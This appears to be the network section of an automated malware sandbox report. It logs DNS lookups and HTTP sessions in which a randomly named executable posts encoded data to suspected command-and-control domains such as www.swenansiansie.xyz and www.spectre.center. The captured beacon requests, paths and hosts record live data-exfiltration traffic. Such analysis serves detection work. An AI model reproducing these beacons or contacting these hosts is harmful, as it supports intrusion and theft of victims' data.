                                                                                                        Dec 2, 2024 14:39:18.412097931 CET1.1.1.1192.168.2.60x7c81No error (0)cbprecise.online15.197.148.33A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:39:33.851263046 CET1.1.1.1192.168.2.60x78ebNo error (0)www.yun08ps.top47.238.157.253A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:39:33.851278067 CET1.1.1.1192.168.2.60x78ebNo error (0)www.yun08ps.top47.238.157.253A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:09.435236931 CET1.1.1.1192.168.2.60xbedeNo error (0)www.rtpsilva4d.clickrtpsilva4d.clickCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:09.435236931 CET1.1.1.1192.168.2.60xbedeNo error (0)rtpsilva4d.click67.223.117.169A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:24.579834938 CET1.1.1.1192.168.2.60xb0No error (0)www.restobarbebek.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:24.579834938 CET1.1.1.1192.168.2.60xb0No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:24.579834938 CET1.1.1.1192.168.2.60xb0No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:39.732336998 CET1.1.1.1192.168.2.60x20e3No error (0)www.nagasl89.baby162.159.140.104A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:39.732336998 CET1.1.1.1192.168.2.60x20e3No error (0)www.nagasl89.baby162.159.140.160A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:39.732336998 CET1.1.1.1192.168.2.60x20e3No error (0)www.nagasl89.baby172.66.0.158A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:39.732336998 CET1.1.1.1192.168.2.60x20e3No error (0)www.nagasl89.baby172.66.0.102A (IP address)IN (0x0001)false
                                                                                                        Dec 2, 2024 14:40:57.065243959 CET1.1.1.1192.168.2.60xfe76No error (0)www.themessageart.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                        • www.sidqwdf.fun
                                                                                                        • www.swenansiansie.xyz
                                                                                                        • www.spectre.center
                                                                                                        • www.synd.fun
                                                                                                        • www.jagdud.store
                                                                                                        • www.wiretap.digital
                                                                                                        • www.it2sp8.vip
                                                                                                        • www.cbprecise.online
                                                                                                        • www.yun08ps.top
                                                                                                        • www.rtpsilva4d.click
                                                                                                        • www.restobarbebek.xyz
                                                                                                        • www.nagasl89.baby
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.649786185.106.176.204802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:37:21.827713013 CET548OUTGET /enzp/?aNXP_jw=cVkvAZaY29GpnsZyqIF2yuifFE7HKV6pnqAC3WUldb4fq/7Oh6qhLNzjv12xoDmrSb6mv5wmBpstJhqJzvfwudLk3JbApDF6kA+gMwLx/u/2nNZzSM95XnZVFjyCoQq4ImYZsuE=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.sidqwdf.fun
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:37:23.348037004 CET720INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx/1.26.1
                                                                                                        Date: Mon, 02 Dec 2024 13:37:23 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Content-Length: 555
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.6498233.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:37:39.299262047 CET822OUTPOST /08fk/ HTTP/1.1
                                                                                                        Host: www.swenansiansie.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.swenansiansie.xyz
                                                                                                        Referer: http://www.swenansiansie.xyz/08fk/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 39 4d 56 52 55 42 51 44 30 69 4a 4a 67 53 78 76 32 2b 49 4c 6c 33 45 52 38 4f 58 44 4f 70 4b 6a 58 72 54 61 58 50 66 74 61 74 50 64 64 35 30 6f 6b 6c 32 32 35 72 74 4e 72 6c 77 77 78 62 33 6f 72 77 4d 4b 78 34 61 30 69 6e 4d 4b 45 4f 44 78 6a 37 53 4a 2f 64 33 38 47 2b 4c 30 32 53 45 32 4e 4c 53 51 70 69 50 42 38 7a 59 34 4e 76 75 56 6f 6e 64 48 66 6d 4c 79 68 68 42 31 61 4d 6d 31 48 76 39 38 2f 31 47 6e 77 59 64 61 7a 61 44 49 49 46 63 6d 6e 75 62 51 62 38 50 76 68 68 71 73 74 55 79 4b 46 4e 54 50 53 32 79 34 61 76 43 57 75 33 31 2f 33 41 5a 33 64 57 30 56 57 6a 6d 6f 51 79 67 37 49 63 2b 33 61 5a 56 54
                                                                                                        Data Ascii: aNXP_jw=9MVRUBQD0iJJgSxv2+ILl3ER8OXDOpKjXrTaXPftatPdd50okl225rtNrlwwxb3orwMKx4a0inMKEODxj7SJ/d38G+L02SE2NLSQpiPB8zY4NvuVondHfmLyhhB1aMm1Hv98/1GnwYdazaDIIFcmnubQb8PvhhqstUyKFNTPS2y4avCWu31/3AZ3dW0VWjmoQyg7Ic+3aZVT


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.6498313.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:37:41.976974010 CET846OUTPOST /08fk/ HTTP/1.1
                                                                                                        Host: www.swenansiansie.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.swenansiansie.xyz
                                                                                                        Referer: http://www.swenansiansie.xyz/08fk/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 39 4d 56 52 55 42 51 44 30 69 4a 4a 67 7a 42 76 6d 70 55 4c 69 58 45 57 67 65 58 44 41 4a 4c 6b 58 72 50 61 58 4c 48 48 62 66 72 64 64 64 77 6f 6c 6e 65 32 2b 72 74 4e 67 46 77 31 75 72 33 64 72 77 51 34 78 34 6d 30 69 68 67 4b 45 4c 6e 78 6a 49 36 4b 2f 4e 33 36 41 2b 4c 32 6f 69 45 32 4e 4c 53 51 70 69 4c 72 38 7a 41 34 4b 65 65 56 71 44 70 45 58 47 4c 78 6f 42 42 31 4c 38 6e 64 48 76 38 70 2f 30 72 38 77 61 56 61 7a 61 7a 49 52 30 63 6e 73 75 62 57 55 63 4f 35 6d 45 48 44 70 46 37 73 48 62 44 7a 4e 78 4f 79 57 35 66 4d 79 45 31 63 6c 51 35 31 64 55 73 6e 57 44 6d 43 53 79 59 37 61 4c 79 51 56 74 77 77 32 45 2f 67 62 2f 6c 39 68 6f 31 4a 39 58 57 78 6a 68 43 61 4e 77 3d 3d
                                                                                                        Data Ascii: aNXP_jw=9MVRUBQD0iJJgzBvmpULiXEWgeXDAJLkXrPaXLHHbfrdddwolne2+rtNgFw1ur3drwQ4x4m0ihgKELnxjI6K/N36A+L2oiE2NLSQpiLr8zA4KeeVqDpEXGLxoBB1L8ndHv8p/0r8waVazazIR0cnsubWUcO5mEHDpF7sHbDzNxOyW5fMyE1clQ51dUsnWDmCSyY7aLyQVtww2E/gb/l9ho1J9XWxjhCaNw==


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.6498373.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:37:44.639585018 CET1859OUTPOST /08fk/ HTTP/1.1
                                                                                                        Host: www.swenansiansie.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.swenansiansie.xyz
                                                                                                        Referer: http://www.swenansiansie.xyz/08fk/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 39 4d 56 52 55 42 51 44 30 69 4a 4a 67 7a 42 76 6d 70 55 4c 69 58 45 57 67 65 58 44 41 4a 4c 6b 58 72 50 61 58 4c 48 48 62 66 6a 64 63 75 6f 6f 6b 42 57 32 2f 72 74 4e 38 56 77 30 75 72 33 41 72 77 59 38 78 34 71 4b 69 6b 38 4b 43 74 37 78 68 35 36 4b 78 4e 33 36 43 2b 4c 7a 32 53 45 76 4e 4c 44 5a 70 69 37 72 38 7a 41 34 4b 64 47 56 6b 48 64 45 61 6d 4c 79 68 68 42 35 61 4d 6e 6d 48 76 30 35 2f 30 75 4a 78 72 31 61 7a 2b 66 49 54 6d 45 6e 7a 65 62 55 52 63 4f 78 6d 45 44 63 70 46 33 4b 48 62 66 5a 4e 32 6d 79 54 39 43 68 70 67 31 6f 6e 69 5a 6a 4b 6b 59 45 51 32 2b 67 62 56 30 58 66 72 32 55 49 38 56 54 31 6b 7a 70 52 35 6f 4d 30 2b 38 68 78 52 71 67 68 41 7a 66 56 67 2f 35 53 37 4d 79 48 76 34 4a 6e 69 6d 56 68 33 61 31 6a 70 2b 6e 59 50 5a 52 6f 34 45 6f 69 47 65 30 72 4c 58 2b 72 2b 6c 39 37 58 34 53 54 56 67 68 34 6e 75 46 53 4f 5a 62 78 4e 6d 42 31 53 44 73 35 68 46 55 67 53 69 35 67 38 2f 2f 57 4d 30 5a 52 68 77 6d 77 75 4e 49 50 72 4d 43 33 68 62 7a 63 78 55 7a 70 66 [TRUNCATED]
                                                                                                        Data Ascii: aNXP_jw=9MVRUBQD0iJJgzBvmpULiXEWgeXDAJLkXrPaXLHHbfjdcuookBW2/rtN8Vw0ur3ArwY8x4qKik8KCt7xh56KxN36C+Lz2SEvNLDZpi7r8zA4KdGVkHdEamLyhhB5aMnmHv05/0uJxr1az+fITmEnzebURcOxmEDcpF3KHbfZN2myT9Chpg1oniZjKkYEQ2+gbV0Xfr2UI8VT1kzpR5oM0+8hxRqghAzfVg/5S7MyHv4JnimVh3a1jp+nYPZRo4EoiGe0rLX+r+l97X4STVgh4nuFSOZbxNmB1SDs5hFUgSi5g8//WM0ZRhwmwuNIPrMC3hbzcxUzpfTHwFBnxV+xShcFfXqg3q9OU2LXaOLi+zfUbCAKMp3RKnGw7vFElxhatrS1sjpLqt30d5CYYbC7M+Ev1SwE/XkGz1wBboVMW5tliZCALCFwNO5I+azoBNMnQHoLpdt1oZ8VBJDwgsQVSDZG3RnXy5HumxGhEC7P7yjJnHxFx+NejRqm36Z7yXWswt3P8T4vFXbZMBoFwT4FpcGw1DffnSO1sm08ZUDHh0ENd6UPTrpwOpIB7WFxpP6B8+ukTx5ABfIbyYqA6US7a8KELoBjRQcGjv3LcVyWrsGcchHbceJs5R0NPa3GnriMDxojvUrZ170mKicMVxqJIDgVnnGdexPShfho/A5C1fQb7Z+03re8y40sUy3s+o1WjH/tcNo/u31s1m0YBx9pp0877bQszEPDWNdqSmheQqpNlRl/IyVVJvpRSBRuOJX+DNcHCQ9N662RsZY6HOl4yDMePBhkDlMVv6xfQf89wGSXMOxavERcEWpAAbh+UA6uGTFT8QGzuV0JElk3lW+dPJbbb4VeDM4X48MK5VWzOJCPkMTALOlR4gb7iaSjNCiWkrdJ8Bdnu3eyBz7FawoAAZBfdokQpzjVG1x9zooKmcMX1PAhV87IOsEygDJ9T+n0R1FAqffQzUFfNi1C552Dv3vgrftCJGJ/+sqH70m5RP0s [TRUNCATED]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.6498433.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:37:47.302540064 CET554OUTGET /08fk/?aNXP_jw=wO9xX0AKySxfvwdHh4QTlRV0r5byLZyAFqW9fcrcStHhFZoMkGqz6sQIsykFtZP4y0c8jJ2OtnUnMO7zvO6a787TBpev3CA9JKuvjWbz5jcDVeWMoitqZ3m3uhcYDsapTcVm+CQ=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.swenansiansie.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:37:48.437875032 CET414INHTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Mon, 02 Dec 2024 13:37:48 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 274
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 61 4e 58 50 5f 6a 77 3d 77 4f 39 78 58 30 41 4b 79 53 78 66 76 77 64 48 68 34 51 54 6c 52 56 30 72 35 62 79 4c 5a 79 41 46 71 57 39 66 63 72 63 53 74 48 68 46 5a 6f 4d 6b 47 71 7a 36 73 51 49 73 79 6b 46 74 5a 50 34 79 30 63 38 6a 4a 32 4f 74 6e 55 6e 4d 4f 37 7a 76 4f 36 61 37 38 37 54 42 70 65 76 33 43 41 39 4a 4b 75 76 6a 57 62 7a 35 6a 63 44 56 65 57 4d 6f 69 74 71 5a 33 6d 33 75 68 63 59 44 73 61 70 54 63 56 6d 2b 43 51 3d 26 63 54 54 38 75 3d 51 34 4e 48 6f 48 4a 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?aNXP_jw=wO9xX0AKySxfvwdHh4QTlRV0r5byLZyAFqW9fcrcStHhFZoMkGqz6sQIsykFtZP4y0c8jJ2OtnUnMO7zvO6a787TBpev3CA9JKuvjWbz5jcDVeWMoitqZ3m3uhcYDsapTcVm+CQ=&cTT8u=Q4NHoHJ0"}</script></head></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.6498785.39.10.93802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:02.538472891 CET813OUTPOST /v70f/ HTTP/1.1
                                                                                                        Host: www.spectre.center
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.spectre.center
                                                                                                        Referer: http://www.spectre.center/v70f/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 4d 44 6f 44 65 63 69 6d 4f 6c 37 71 59 78 65 43 38 65 67 77 61 43 41 63 45 66 64 57 30 38 4b 56 46 75 62 57 32 70 34 75 45 53 50 4e 63 72 76 56 31 75 6f 57 4d 4d 59 61 6e 41 6e 34 53 66 64 63 74 61 45 6a 47 62 5a 49 35 33 62 63 33 2b 38 71 61 34 74 34 66 44 70 58 35 50 59 70 6c 34 6a 42 68 31 79 51 4f 64 75 68 50 77 78 2b 66 69 67 79 46 44 31 79 4c 62 53 36 36 6a 46 64 2b 35 4d 49 54 47 45 78 34 6c 46 37 62 79 44 52 59 30 4e 79 2b 7a 2f 46 36 43 55 6d 45 67 6e 61 63 37 68 48 79 4f 45 66 74 6e 4b 6c 64 61 4e 42 72 4e 4c 45 2f 2b 32 69 59 54 4d 30 72 33 6a 56 52 30 65 6c 63 66 65 78 4f 62 52 35 62 4e 48 37
                                                                                                        Data Ascii: aNXP_jw=MDoDecimOl7qYxeC8egwaCAcEfdW08KVFubW2p4uESPNcrvV1uoWMMYanAn4SfdctaEjGbZI53bc3+8qa4t4fDpX5PYpl4jBh1yQOduhPwx+figyFD1yLbS66jFd+5MITGEx4lF7byDRY0Ny+z/F6CUmEgnac7hHyOEftnKldaNBrNLE/+2iYTM0r3jVR0elcfexObR5bNH7
                                                                                                        Dec 2, 2024 14:38:03.860548973 CET354INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:03 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.6498855.39.10.93802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:05.197454929 CET837OUTPOST /v70f/ HTTP/1.1
                                                                                                        Host: www.spectre.center
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.spectre.center
                                                                                                        Referer: http://www.spectre.center/v70f/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 4d 44 6f 44 65 63 69 6d 4f 6c 37 71 59 54 4b 43 2f 39 49 77 63 69 41 66 41 76 64 57 39 63 4c 39 46 75 6e 57 32 72 55 41 45 67 62 4e 63 4b 2f 56 30 71 38 57 50 4d 59 61 73 67 6e 68 63 2f 64 68 74 61 42 4a 47 65 35 49 35 33 66 63 33 38 6b 71 61 72 46 6e 65 54 70 52 79 76 59 72 76 59 6a 42 68 31 79 51 4f 63 4f 48 50 77 70 2b 65 54 51 79 45 68 64 39 42 37 53 39 79 44 46 64 31 5a 4d 45 54 47 45 70 34 6b 70 52 62 77 37 52 59 30 39 79 39 6d 4c 43 77 43 55 6b 4a 41 6d 78 54 70 67 4b 2f 75 34 64 6a 6c 47 63 4c 35 42 6e 6e 62 57 65 6a 4e 32 42 4b 44 73 32 72 31 37 6e 52 55 65 50 65 66 6d 78 63 4d 64 65 55 35 69 59 52 63 6b 51 68 4c 4e 56 75 47 4b 55 4b 4c 34 68 77 71 74 57 46 41 3d 3d
                                                                                                        Data Ascii: aNXP_jw=MDoDecimOl7qYTKC/9IwciAfAvdW9cL9FunW2rUAEgbNcK/V0q8WPMYasgnhc/dhtaBJGe5I53fc38kqarFneTpRyvYrvYjBh1yQOcOHPwp+eTQyEhd9B7S9yDFd1ZMETGEp4kpRbw7RY09y9mLCwCUkJAmxTpgK/u4djlGcL5BnnbWejN2BKDs2r17nRUePefmxcMdeU5iYRckQhLNVuGKUKL4hwqtWFA==
                                                                                                        Dec 2, 2024 14:38:06.522099018 CET354INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 02 Dec 2024 13:38:06 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.6498905.39.10.93802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:07.869075060 CET1850OUTPOST /v70f/ HTTP/1.1
                                                                                                        Host: www.spectre.center
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.spectre.center
                                                                                                        Referer: http://www.spectre.center/v70f/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
